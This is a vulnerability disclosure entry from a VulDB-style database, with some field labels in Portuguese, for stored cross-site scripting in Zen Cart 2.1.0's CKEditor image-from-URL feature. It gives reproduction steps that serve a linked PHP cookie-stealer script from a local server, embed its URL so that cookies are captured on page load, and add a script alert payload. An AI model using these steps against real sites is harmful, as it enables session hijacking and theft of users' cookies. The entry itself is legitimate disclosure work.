| Título | Zen Ventures, LLC Zen-Cart 2.1.0 Cross Site Scripting |
|---|
| Descrição | Description
Zencart has an interesting feature that allows administrators to change the text editor used across the website for editing pages or products and gives them two choices to choose between a “Plain text” editor and “CKEditor”.
The problem is that CKEditor allows inserting images from a link, SVG images are blacklisted by default in Zencart. If you try upload a SVG file you will get errors but you can still insert a SVG file through CKEditor's “Insert image from URL" functionality.
In fact you can also insert .php malicious cookie grabbers and the application will treat it as an image which results in immediate trigger as soon as web page loads.
Reproduce
To reproduce the issue, I am going to use a PHP cookie stealer script to demonstrate how this vulnerability can be used to steal cookies.
Save the following file as capture.php:
https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd
Launch a PHP server to serve this file:
> php -S x.x.x.x:1718
To reproduce this issue, change your Text Editor's type from Plain Text to CKEditor. You can make this change through [/index.php?cmd=define_pages_editor]
Once done, open a product for editing, the URI may look something like this:
[/index.php?cmd=product&page=1&cPath=1_4&product_type=1&pID=1&action=new_product]
Click “Insert image via URL” icon in CKEditor. A small window will appear asking for an image link but there are no filtering in place to ensure that users only use this feature to insert images and not something else.
Inside this small window, you can put the full link to your php cookie grabber, in my case it's the following:
http://127.0.0.1:1718/capture.php
Now you can visit the product and check your PHP server for cookie logs:
http://127.0.0.1/zencart/index.php?main_page=product_info&cPath=1_4&products_id=1
Additionally, the following payload works as well:
<script>alert("hacked")</script> |
|---|
| Fonte | ⚠️ https://hkohi.ca/vulnerability/28 |
|---|
| Utilizador | 0xHamy (UID 88518) |
|---|
| Submissão | 04/08/2025 18h44 (há 11 meses) |
|---|
| Moderação | 17/08/2025 16h20 (13 days later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 320425 [ZenCart 2.1.0 CKEditor Script de Site Cruzado] |
|---|
| Pontos | 20 |
|---|